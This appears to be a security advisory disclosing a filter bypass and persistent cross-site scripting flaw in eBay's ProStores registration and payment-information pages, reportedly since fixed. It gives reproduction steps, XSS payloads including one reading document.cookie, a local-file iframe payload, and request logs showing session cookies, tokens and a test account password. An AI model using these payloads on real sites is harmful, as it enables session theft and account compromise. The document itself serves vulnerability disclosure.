Ebay Magento fixed Application Side Vulnerability & Filter Bypass in ProStore

After the announcement of the ebay inc magento team in the last month the company updated the prostore services and application during 31 of july. One of the issue has been recorded and reported to the ebay inc security team about 2 month ago. A filter bypass and persistent input validation web vulnerability was located in the prostore application front- and backend.

The filter bypass issue was located in the regular registration formular of the ebay prostore application service. Remote attackers are able to bypass the user first- & lastname input fields restriction of the framework. Remote attackers are able to inject own payloads by holding `strg+v` (combo - copy-paste) to keep the payload inside of the input field. Next to holding the buttons the attacker clicks the send button. The filter protection of the application and api does not have a second proof of validation next to sending a registration formular with the trick and script code payloads in the last- & firstname values. After the first save of the input value and jump to the payment via paypal menu the attacker can save one string per request to the user credentials. By including in the first request procedure only one payload in for example the firstname value, the attacker can include via the same way also in the last-name after activating a paypal payment account.

The persistent input validation vulnerability is located in the vulnerable cardholder value of the payment information and payment details module. The vulnerability can be exploited by remote attackers with low privileged application user accounts. The attacker vector is persistent and the execution of the injected payload occurs in the /cp/ payment and not the /admin/ on the applicat-side. To exploit the persistent vulnerability, its required to use the reported filter bypass ago.

Note: We are not sure yet if the persistent issue also affects the manager/admin backend when reviewing the payment information of us. Should be checked by internal with feedback. All interaction with the compromised test payment information should be reviewed by different perspectives on interaction.

Exploitation of the filter bypass issue requires no privileged application user account and no user interaction. Exploitation of the persistent input validation web vulnerability requires a low privileged application user account and low or medium user interaction. Successful exploitation of the filter issue leads to evasion of the regular scheme. Successful exploitation of the persistent input validation web vulnerability

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] ../CP/ > Payment Information & payment Details (Card Details)

Vulnerable File(s):
[+] store_payment_info.php

Vulnerable Parameter(s):
[+] first- & lastname
[+] Cardholder Name

Affected Module(s):
[+] https://mystore.prostores.com/CP/

Proof of Concept (PoC):
The filter bypass issue can be exploited by remote attackers without user interaction or privileged appliation user account. The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an account at prostore for testings and policy
2. On the registration you include in the lastname a payload and press strg+v, then you click the send button
3. You get redirected to include the payment information and link a paypal account
4. You get redirected again back to the registration step one with the linked account
5. You press strg+v and hold it for including in the firstname (only one input per loop), press next to it via mouse the send button and complete the procedure of registration
6. Login to the cp and visit the following payment information url
Note: All interaction with the compromised payment information can have an affect to the moderator/administrator backend on review or interaction.
7. Successful reproduce of the filter bypass issue in the registration and persistent issue in the payment information!

PoC: ProStores - Payment Information > Payment

        <div id="ccInfoReadMode" style="display: none">
            <table width="50%">
                <tbody><tr>
                    <td bgcolor="#C0D9E8">
                        <strong>Card Details</strong>
                    </td>
                </tr>
                <tr>
                    <td>
                        PayPal                     </td>
                </tr>
                <tr>
                    <td>
                        Expires: /                     </td>
                </tr>
                <tr>
                    <td> </td>
                </tr>
                <tr>
                    <td bgcolor="#C0D9E8">
                        <strong>Cardholder Name and Address</strong>
                    </td>
                </tr>
                <tr>
                    <td>
                        imgsrcxonerrorprompt23 "><img src="x" onerror="prompt(23);">                    </td>
                </tr>
                <tr>
                    <td>
                         "><img src="x" onerror="prompt(23);"><br>
                                            </td>
                </tr>
                <tr>
                    <td>
                         "><img src="x" onerror="prompt(23);">, 34128                    </td>
                </tr>
                <tr>
                    <td>
                        DE                    </td>
                </tr>
            </tbody></table>

Note:The vulnerable file which executes the code is not located in /admin/ and affects the payment information via CP > https://mystore.prostores.com/CP/store_payment_info.php

PoC: (Payload)
XSS > %20<img src="http://evolution-sec.com/sites/default/files/65-2_0.png" onerror="prompt(23);"> or %20><script>alert(document.cookie)</script><div style="1
LFI EXEC > %20&<iframe src=../../[LOCAL WEB-SERVER FILE URL]>%20<iframe>

--- PoC Session Logs [GET] ---
18:15:47.980[2008ms][total 2008ms] Status: 200[Found]
GET https://mystore.prostores.com/CP/x Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[202] Mime Type[text/html]
   Request Header:
      Host[mystore.prostores.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://mystore.prostores.com/CP/store_payment_info.php]
      Cookie[PHPSESSID=826428ce1004e4ba19f9a51e500ccce9; __utma=207397714.1830693225.1400083192.1400083192.1400083192.1;
__utmb=207397714.28.10.1400083192; __utmc=207397714; __utmz=207397714.1400083192.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pstoken=d64c7ede0e1cdf732f6c3d0e2ad1e003]
      Connection[keep-alive]
   Response Header:
      Date[Wed, 14 May 2014 16:16:06 GMT]
      Server[Apache]
      Content-Length[202]
      Connection[close]
      Content-Type[text/html; charset=iso-8859-1]

18:16:51.227[237ms][total 237ms] Status: 200[OK]
GET https://mystore.prostores.com/CP/x Load Flags[LOAD_NORMAL] Größe des Inhalts[202] Mime Type[text/html]
   Request Header:
      Host[mystore.prostores.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://mystore.prostores.com/CP/store_payment_info.php]
      Cookie[PHPSESSID=826428ce1004e4ba19f9a51e500ccce9; __utma=207397714.1830693225.1400083192.1400083192.1400083192.1;
__utmb=207397714.28.10.1400083192; __utmc=207397714; __utmz=207397714.1400083192.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pstoken=d64c7ede0e1cdf732f6c3d0e2ad1e003]
      Connection[keep-alive]
   Response Header:
      Date[Wed, 14 May 2014 16:17:07 GMT]
      Server[Apache]
      Content-Length[202]
      Connection[close]
      Content-Type[text/html; charset=iso-8859-1]

Note:Shows the execution GET method request in the regular cp service after the inject in the registration. The full poc session logs with registration is available in the attachment. The issue can also be used to request local path through the trusted value context of the payment. The result could be a local file or path include to request unauthorized local web-sevrer content by processing a payment.

Test Shop Data for Magento Bug Bounty & Reward Policy:

POST-Daten:
form_token
[4ead7270771d9a8b1bf119956fa2ce62]
form_step[step1]
username[imgsrcxonerrorprompt23]
email[bkm%40evolution-sec.com]
password[chaos666]
confirm_password[chaos666]
industry[29]
offer[]
ded_store_name[+%22%3E%3Cimg+src%3Dx+onerror
%3Dprompt(23)%3B%3E]
shared_store_name[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(23)%3B%3E]
next[]
elqSiteID[2299]
elqFormName[PHP_Repost_SignUp]
ebay_seller_ID[]
ebay_seller_level[]
ebay_store_flag[0]
ebay_Customer[0]
prefix[store01]
promotion[]
signup_complete[0]